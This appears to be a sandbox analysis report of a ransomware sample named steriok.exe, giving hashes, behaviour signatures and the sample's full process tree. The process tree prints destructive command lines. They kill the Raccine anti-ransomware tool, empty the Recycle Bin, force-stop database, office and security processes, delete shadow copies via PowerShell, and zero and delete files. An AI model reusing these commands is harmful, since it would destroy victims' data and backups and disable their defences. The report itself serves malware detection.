Resubmissions

29-10-2021 09:03

211029-kz7xysdac7 10

28-10-2021 13:28

211028-qq5dcsgdeq 10

23-10-2021 01:52

211023-cagepshab4 8

Analysis

  • max time kernel
    121s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    23-10-2021 01:52

General

  • Target

    steriok.exe

  • Size

    94KB

  • MD5

    b0c615c0a4f485b2030d6e1ab98375f0

  • SHA1

    de11e9d61e0a31dc19e8c5dd8fe06facf0ead052

  • SHA256

    eb2ed1680e9b2350d78f431849a9e8c5c1d91d97ae72767d228b2208e6f72f46

  • SHA512

    82342be7d388244b5b008134d6d351f669995caff94a9a532ce056130f1af54a20ec6f2b9a3ca78102200c53a73659d1043e5b213ce84642d225690a3a848024

Score
8/10

Malware Config

Signatures

  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Drops file in Windows directory 23 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\steriok.exe
    "C:\Users\Admin\AppData\Local\Temp\steriok.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4200
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4468
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:2152
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:3324
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:3912
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:4308
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config Dnscache start= auto
            2⤵
              PID:4060
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config SQLTELEMETRY start= disabled
              2⤵
                PID:524
              • C:\Windows\SysWOW64\sc.exe
                "sc.exe" config FDResPub start= auto
                2⤵
                  PID:652
                • C:\Windows\SysWOW64\sc.exe
                  "sc.exe" config SSDPSRV start= auto
                  2⤵
                    PID:1040
                  • C:\Windows\SysWOW64\sc.exe
                    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                    2⤵
                      PID:1124
                    • C:\Windows\SysWOW64\sc.exe
                      "sc.exe" config upnphost start= auto
                      2⤵
                        PID:1468
                      • C:\Windows\SysWOW64\sc.exe
                        "sc.exe" config SstpSvc start= disabled
                        2⤵
                          PID:1636
                        • C:\Windows\SysWOW64\sc.exe
                          "sc.exe" config SQLWriter start= disabled
                          2⤵
                            PID:1836
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2380
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM synctime.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2400
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mspub.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2496
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM Ntrtscan.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4232
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4260
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM isqlplussvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5000
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5048
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mysqld.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2328
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM firefoxconfig.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4688
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM onenote.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2224
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqbcoreservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3112
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM agntsvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4620
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM encsvc.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:608
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM tbirdconfig.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2640
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM PccNTMon.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4796
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM dbeng50.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1052
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM excel.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2188
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM thebat.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2764
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM msaccess.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1964
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM steam.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2252
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM thebat64.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2556
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM CNTAoSMgr.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2920
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM outlook.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3608
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM ocomm.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1748
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM tmlisten.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2052
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" IM thunderbird.exe /F
                            2⤵
                            • Kills process with taskkill
                            PID:3728
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqlwriter.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3732
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM dbsnmp.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4116
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM msftesql.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4044
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM infopath.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:704
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM wordpad.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3260
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM xfssvccon.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4448
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM powerpnt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:436
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mbamtray.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3104
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mysqld-opt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1140
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM zoolz.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:828
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1892
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM ocautoupds.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1772
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM visio.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3984
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM ocssd.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2740
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1084
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM oracle.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4272
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM winword.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2656
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqlagent.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4980
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mysqld-nt.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2228
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqlbrowser.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4716
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM sqlservr.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3116
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                            2⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:400
                          • C:\Windows\SysWOW64\notepad.exe
                            "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
                            2⤵
                            • Opens file in notepad (likely ransom note)
                            PID:1888
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                            2⤵
                              PID:2672
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.7 -n 3
                                3⤵
                                • Runs ping.exe
                                PID:2164
                              • C:\Windows\SysWOW64\fsutil.exe
                                fsutil file setZeroData offset=0 length=524288 “%s”
                                3⤵
                                  PID:2452
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\steriok.exe
                                2⤵
                                  PID:2476
                                  • C:\Windows\SysWOW64\choice.exe
                                    choice /C Y /N /D Y /T 3
                                    3⤵
                                      PID:4236
                                • C:\Windows\system32\NOTEPAD.EXE
                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\RESTORE_FILES_INFO.txt
                                  1⤵
                                  • Opens file in notepad (likely ransom note)
                                  PID:1640
                                • C:\Windows\SysWOW64\werfault.exe
                                  werfault.exe /h /shared Global\34db701d52b04e3894e39ad150289701 /t 2444 /p 1888
                                  1⤵
                                    PID:5080

                                  Network

                                  MITRE ATT&CK Enterprise v6

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

                                    MD5

                                    7ca28064fba0c5907d42764d7397b5fb

                                    SHA1

                                    48f82e0d4a8c949d737e11c81bbe0dac2c5271c6

                                    SHA256

                                    a98e6b3a64a23bcef3ae76dfd2a323d99da6be68bc11a2a3f3adc759a5ea9fbe

                                    SHA512

                                    9369df09b2178374e944a2f8e5e751b48ddaee1b94792f99194e78ad73d428bcfb6911b21aa51dd81406a7163a18f46f180a7e4778df54870bb93cd1d5a0ae11

                                  • C:\Users\Public\Desktop\RESTORE_FILES_INFO.txt

                                    MD5

                                    7ca28064fba0c5907d42764d7397b5fb

                                    SHA1

                                    48f82e0d4a8c949d737e11c81bbe0dac2c5271c6

                                    SHA256

                                    a98e6b3a64a23bcef3ae76dfd2a323d99da6be68bc11a2a3f3adc759a5ea9fbe

                                    SHA512

                                    9369df09b2178374e944a2f8e5e751b48ddaee1b94792f99194e78ad73d428bcfb6911b21aa51dd81406a7163a18f46f180a7e4778df54870bb93cd1d5a0ae11

                                  • memory/400-182-0x0000000000000000-mapping.dmp

                                  • memory/400-193-0x0000000007D50000-0x0000000007D51000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-183-0x0000000004A10000-0x0000000004A11000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-185-0x0000000004B30000-0x0000000004B31000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-186-0x0000000007690000-0x0000000007691000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-194-0x0000000008650000-0x0000000008651000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-187-0x0000000007490000-0x0000000007491000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-195-0x00000000086A0000-0x00000000086A1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-208-0x0000000004BC4000-0x0000000004BC6000-memory.dmp

                                    Filesize

                                    8KB

                                  • memory/400-196-0x0000000004A10000-0x0000000004A11000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-206-0x0000000004A10000-0x0000000004A11000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-192-0x0000000004BC2000-0x0000000004BC3000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-190-0x0000000007FC0000-0x0000000007FC1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-188-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-207-0x0000000004BC3000-0x0000000004BC4000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-191-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/400-184-0x0000000004A10000-0x0000000004A11000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/436-167-0x0000000000000000-mapping.dmp

                                  • memory/524-128-0x0000000000000000-mapping.dmp

                                  • memory/608-147-0x0000000000000000-mapping.dmp

                                  • memory/652-129-0x0000000000000000-mapping.dmp

                                  • memory/704-164-0x0000000000000000-mapping.dmp

                                  • memory/828-170-0x0000000000000000-mapping.dmp

                                  • memory/1040-130-0x0000000000000000-mapping.dmp

                                  • memory/1052-150-0x0000000000000000-mapping.dmp

                                  • memory/1084-175-0x0000000000000000-mapping.dmp

                                  • memory/1124-131-0x0000000000000000-mapping.dmp

                                  • memory/1140-169-0x0000000000000000-mapping.dmp

                                  • memory/1468-132-0x0000000000000000-mapping.dmp

                                  • memory/1636-133-0x0000000000000000-mapping.dmp

                                  • memory/1748-158-0x0000000000000000-mapping.dmp

                                  • memory/1772-172-0x0000000000000000-mapping.dmp

                                  • memory/1836-134-0x0000000000000000-mapping.dmp

                                  • memory/1888-209-0x0000000000000000-mapping.dmp

                                  • memory/1892-171-0x0000000000000000-mapping.dmp

                                  • memory/1964-153-0x0000000000000000-mapping.dmp

                                  • memory/2052-159-0x0000000000000000-mapping.dmp

                                  • memory/2152-123-0x0000000000000000-mapping.dmp

                                  • memory/2164-211-0x0000000000000000-mapping.dmp

                                  • memory/2188-151-0x0000000000000000-mapping.dmp

                                  • memory/2224-144-0x0000000000000000-mapping.dmp

                                  • memory/2228-179-0x0000000000000000-mapping.dmp

                                  • memory/2252-154-0x0000000000000000-mapping.dmp

                                  • memory/2328-142-0x0000000000000000-mapping.dmp

                                  • memory/2380-135-0x0000000000000000-mapping.dmp

                                  • memory/2400-136-0x0000000000000000-mapping.dmp

                                  • memory/2496-137-0x0000000000000000-mapping.dmp

                                  • memory/2556-155-0x0000000000000000-mapping.dmp

                                  • memory/2640-148-0x0000000000000000-mapping.dmp

                                  • memory/2656-177-0x0000000000000000-mapping.dmp

                                  • memory/2672-210-0x0000000000000000-mapping.dmp

                                  • memory/2740-174-0x0000000000000000-mapping.dmp

                                  • memory/2764-152-0x0000000000000000-mapping.dmp

                                  • memory/2920-156-0x0000000000000000-mapping.dmp

                                  • memory/3104-168-0x0000000000000000-mapping.dmp

                                  • memory/3112-145-0x0000000000000000-mapping.dmp

                                  • memory/3116-181-0x0000000000000000-mapping.dmp

                                  • memory/3260-166-0x0000000000000000-mapping.dmp

                                  • memory/3324-124-0x0000000000000000-mapping.dmp

                                  • memory/3608-157-0x0000000000000000-mapping.dmp

                                  • memory/3728-160-0x0000000000000000-mapping.dmp

                                  • memory/3732-161-0x0000000000000000-mapping.dmp

                                  • memory/3912-125-0x0000000000000000-mapping.dmp

                                  • memory/3984-173-0x0000000000000000-mapping.dmp

                                  • memory/4044-163-0x0000000000000000-mapping.dmp

                                  • memory/4060-127-0x0000000000000000-mapping.dmp

                                  • memory/4116-162-0x0000000000000000-mapping.dmp

                                  • memory/4200-120-0x0000000005310000-0x0000000005311000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/4200-121-0x0000000005480000-0x0000000005481000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/4200-118-0x0000000000B00000-0x0000000000B01000-memory.dmp

                                    Filesize

                                    4KB

                                  • memory/4232-138-0x0000000000000000-mapping.dmp

                                  • memory/4260-139-0x0000000000000000-mapping.dmp

                                  • memory/4272-176-0x0000000000000000-mapping.dmp

                                  • memory/4308-126-0x0000000000000000-mapping.dmp

                                  • memory/4448-165-0x0000000000000000-mapping.dmp

                                  • memory/4468-122-0x0000000000000000-mapping.dmp

                                  • memory/4620-146-0x0000000000000000-mapping.dmp

                                  • memory/4688-143-0x0000000000000000-mapping.dmp

                                  • memory/4716-180-0x0000000000000000-mapping.dmp

                                  • memory/4796-149-0x0000000000000000-mapping.dmp

                                  • memory/4980-178-0x0000000000000000-mapping.dmp

                                  • memory/5000-140-0x0000000000000000-mapping.dmp

                                  • memory/5048-141-0x0000000000000000-mapping.dmp